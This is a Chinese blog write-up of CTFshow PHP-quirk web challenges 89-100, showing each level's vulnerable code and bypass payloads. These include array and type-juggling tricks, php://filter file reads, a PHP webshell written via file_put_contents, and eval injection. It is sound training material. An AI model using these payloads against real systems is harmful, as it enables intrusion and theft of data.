CTFshow-php特性

已于 2023-03-24 19:57:27 修改
阅读量525 收藏 2
点赞数 3
文章标签: php 开发语言 Powered by 金山文档
于 2023-01-25 21:36:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61376069/article/details/128762060
版权

ctfshow-web-89

if(isset($_GET['num'])){
    $num = $_GET['num'];
    if(preg_match("/[0-9]/", $num)){
        die("no no no!");
    }
    if(intval($num)){
        echo $flag;
    }
}

题目逻辑是传入num,并且用preg_match匹配,如果有数字则输出"no no no!"并退出脚本.

否则进行下一步,如果intval返回真,则输出flag.

preg_match不能处理数组而不会进行正则匹配,并且intval处理数组返回真

payload:num[]= 或num[]=任意

PHP intval() 函数

ctfshow-web-90

intval()函数、强比较

if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

这题需要传入num的值不等于4476,并且用num本身的进制把num换成十进制,值为4476.

强比较
在php中,三个等号“===”是全等比较运算符,用于比较两个操作数的值是否相等,同时检测它们的类型是否相同;只有两边的值和数据类型都相等时,运算结果才是TRUE。

payload:

?num=4476.0,//小数点

?num=+4476.0,//正负号

?num=010574,//4476的8进制

?num=010574,//8进制+空格

?num=0x117c,//4476的16进制

?num=4476e0,//科学计数法

?num=4476ppp,//intval()中如果$base=0,则$var中存在字母的话遇到字母就会停止读取,传入4476a会将后面的a丢弃

ctfshow-web-91

preg_match正则表达式匹配 

$a=$_GET['cmd'];
if(preg_match('/^php$/im', $a)){
    if(preg_match('/^php$/i', $a)){
        echo 'hacker';
    }
    else{
        echo $flag;
    }
}
else{
    echo 'nonononono';
}

^php$/im中

^php$ :意思是只能是php,

i:标记这是一个大小写不敏感的搜索,不区分大小写

m:多行匹配,若存在换行\n并且有开始^或结束$符的情况下,将以换行为分隔符,逐行进行匹配

满足第一个匹配并且不满足第二个匹配payload:

?cmd=%0aphp

ctfshow-web-92

和90题一样payload:

?num=0x117c

ctfshow-web-93

if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }

多过滤了字母,可以用八进制.

payload:

?num=010574

ctfshow-web-94

strpos() 函数

if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(!strpos($num, "0")){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

if(!strpos($num, "0"))增加了这个if语句

strpos(string,find,start)

string 必需。规定被搜索的字符串。
find 必需。规定要查找的字符。
start 可选。规定开始搜索的位置。
返回值:返回字符串在另一字符串中第一次出现的位置,如果没有找到字符串则返回 FALSE。字符串位置从 0 开始,不是从 1 开始。

也就是传入的num中的0必须不在首位,如果在首位!strpos($num, "0")=1就会执行if

payload:

?num= 010574
?num=4476.0
?num=+010574

ctfshow-web-95

把点过滤了,不过还是能在前面加空格、换行或者加减号.

?num= 010574
?num=%0a010574
?num=+010574

ctfshow-web-96

文件路径

if(isset($_GET['u'])){
    if($_GET['u']=='flag.php'){
        die("no no no");
    }else{
        highlight_file($_GET['u']);
    }
}

在linux下面表示当前目录是 "./" " . ./"代表上一层目录 “/”:代表根目录.

payload:

./flag.php                            相对路径
/var/www/html/flag.php                绝对路径
php://filter/resource=flag.php        php伪协议 
php://filter/read=convert.base64-encode/resource=flag.php

ctfshow-web-97

MD5值比较绕过

if (isset($_POST['a']) and isset($_POST['b'])) {
if ($_POST['a'] != $_POST['b'])
if (md5($_POST['a']) === md5($_POST['b']))
echo $flag;
else
print 'Wrong.';
}
?>
===会比较类型,这个时候可以用到PHP中md5()函数无法处理数组(会返回NULL)来实现绕过。
md5()函数处理数组不会报错,结果还会返回null,在强比较里面null=null为 True 绕过。

payload:

a[]=1&b[]=2

php MD5值比较绕过

PHP中MD5常见绕过

ctfshow-web-98

php三元运算符

$_GET?$_GET=&$_POST:'flag';
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);

?>
三元运算符语法:条件 ? 结果1 : 结果2说明:问号前面的位置是判断的条件,如果满足条件时结果1,不满足时结果2。
php三元运算符与if的详解

$_GET?$_GET=&$_POST:'flag' 如果存在GET请求,则用POST请求传入的值将其覆盖掉.

代码解释就是:

if(isset($_GET)){
    $_GET=&$_POST;
}else{
    'flag';
}

$_GET['HTTP_FLAG']=='flag'?$flag:__FILE__ GET传入的HTTP_FLAG的值为flag,则输出flag.

所以POST:HTTP_FLAG=flag;GET随便传什么都行.

ctfshow-web-99

highlight_file(__FILE__);
$allow = array();                //设置为数组
for ($i=36; $i < 0x36d; $i++) { 
    array_push($allow, rand(1,$i));        //向数组里面插入随机数
}
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){
    file_put_contents($_GET['n'], $_POST['content']);
}

?>

函数in_array()第三个参数

is_array()可以判断一个值是否在数组中。 is_array()函数

in_array(value,array,type) value :要搜索的值

array : 被搜索的数组

type : 类型,true全等 ,false非全等(默认)

file_put_contents() 函数把一个字符串写入文件中。file_put_contents() 函数

语法:

int file_put_contents ( string $filename , mixed $data [, int $flags = 0 [, resource $context ]] )
filename: 必需。规定要写入数据的文件。 如果文件不存在,则创建一个新文件。 data: 必需。规定要写入文件的数据。可以是字符串、数组或数据流。

GET传入n=1.php

这题file_put_contents() 函数没有设置第三个参数,所以1.php和数字1比较时,1.php会转化为1再和1比较, 满足条件.

接着POST:content=<?php system("ls");?> 传入php代码到1.php中,然后访问1.php发现flag

查看flag,POST:content=<?php system("tac flag36d.php");?>

ctfshow-web-100

php运算符优先级

highlight_file(__FILE__);
include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){
    if(!preg_match("/\;/", $v2)){
        if(preg_match("/\;/", $v3)){
            eval("$v2('ctfshow')$v3");
        }
    } 
}
?>

运算符优先级:

&& > || > = > and > or

$p = 6 or 0;
var_dump($p);//int(6)

$p = 6 || 0;
var_dump($p);//bool(true)

$p = 6 and 0;
var_dump($p); //int(6)

$p = 6 && 0;
var_dump($p); //bool(false)

因为赋值运算的优先级比AND和OR的高,所以先赋值;比&&和||的低,所以逻辑运算符先执行,先逻辑运算,再赋值。

所以v0就等于is_numeric($v1)

v2不能有分号,v3必须有分号,可以直接命令执行,再把中间的('ctfshow')注释掉.

payload:?v1=21&v2=show_source ("ctfshow.php")/*&v3=*/;

或者:

payload:?v1=1&v2=eval($_POST[1])?>&v3=;

南桥几经秋i
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow-php特性-超详解(干货)
qq_50589021的博客
08-05 6490
PHP特性 web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } ?> intval函数(获
ctfshow-php特性
m0_74071940的博客
03-30 451
ctfshow的PHP特性题目
ctfshow-web100(php特性)
m0_62094846的博客
01-14 1405
运算符优先级:&& > || > = > and > or is_numeric() 函数用于检测变量是否为数字或数字字符串。 是数字和数字字符串则返回 TRUE,否则返回 FALSE <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 20
CTFSHOW web入门 web100 wp
wei_xiao_zan的博客
05-22 1308
终于做到100题了!!! 咱就是说先看代码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-21 22:10:28 # @link: https://ctfer.com */ highlight_file(__FILE__); include("ctfshow.p
ctfshow web入门 php特性
Sentiment的博客
04-11 5316
web89 intval() 函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if
ctfshow-web41~60-WP
最新发布
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
CTFShow-周末大挑战parse-url篇Writeup
05-19
base64,PD9waHAgc3lzdGVtKCRfUE9TVFtBXSk7Pz4=`是Base64编码的PHP代码,解码后执行系统命令。这里的`$_POST[A]`代表了从POST请求中获取的变量A,可以用来传递命令。 第四关和第一关很相似,仍然是命令注入,通过`...
PHP特性(网友根据ctfshow整理)1
08-03
以下是一些重要的PHP特性及其详细解释: 1. **弱类型与`==`比较**: PHP支持弱类型,这意味着在进行比较时,不同类型的数据可以被自动转换成相同类型。例如,字符串"123"与整数123使用`==`比较时,它们被视为相等...
CTFSHOW-PHP特性篇总结
qq_62147945的博客
04-09 181
闲来无事,来水一篇文章,PHP特性篇做完也有几天了,但是自己掌握的不怎么样,这一部分的东西有点太零散,感觉很多都复现不出来。但是终究是花费大量时间做完这一部分了,来简单写写总结。说是php特性,其实就是找一下php的bug,怎么利用这些bug来绕过函数,大多数的情况下,可以在本地环境试一下如何绕过那些函数,然后最重要的就是查一下PHP手册。PHP: PHP 手册 - Manual下面就是相关的一些总结,自己掌握的东西不多,感觉会漏掉很多东西。
CTFSHOW WEB89-100 PHP特性 详解
qq_49399033的博客
06-14 5757
CTFSHOW PHP特性做题笔记 详细学习
ctfshow php特性
Je3Z的博客
04-02 760
web115 web123 $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){ if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?/", $c)&&
CTFshow-PHP特性89-90
weixin_51706044的博客
09-29 802
web89 if(isset($_GET['num'])){<br /> $num = $_GET['num'];<br /> if(preg_match("/[0-9]/", $num)){ //正则匹配参数不能为0-9<br /> die("no no no!");<br /> }<br /> if(intval($num)){ //返回num参数的值是,整数型<br /> echo $flag;<br /> }&lt.
CTFshow php特性 web90
Kradress的博客
12-13 276
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-18 16:06:11 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ include("flag.php"); highlig
ctfshow php特性
weixin_63231007的博客
06-13 1344
web113 function filter($file){ if(preg_match('/filter|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){ die('hacker!'); }else{ return $file; } } $file=$_GET['file']; if(! is_file($file)){ highlight_file(filter($f
CTFSHOW WEB入门
qq_51558360的博客
10-11 4367
----------信息搜集---------- 源码泄露 查看源码即可 前台JS绕过 直接开发者工具查看源码 当然也可以抓包查看 也可以禁用js查看源码 协议头信息泄露 或者抓一下包也可 robots后台泄露 phps源码泄露 根据题目猜测输入index.phps 下载到一个index.phps打开得到flag 源码压缩包泄露 访问www.zip 没有flag,尝试访问fl000g.txt 版本控制泄露源码 Git是一个开源的分布式版本控制系统 git代码泄露,git上传代码会在目录创
CTFshow web入门——php特性
小元砸的博客
02-20 5350
Web 89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } }
CTFshow——PHP特性(上)
D.MIND 的博客
02-09 1593
web89——preg_match函数 、数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } preg
CTFShow-Web6
09-06
根据提供的引用内容,CTFShow-Web6可能是一个数据库名。其中,通过注入语句查询数据库web2中的表信息,得到两张表flag和user。具体的注入语句如下所示: ``` username=1'/**/union/**/select/**/1,group_concat...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值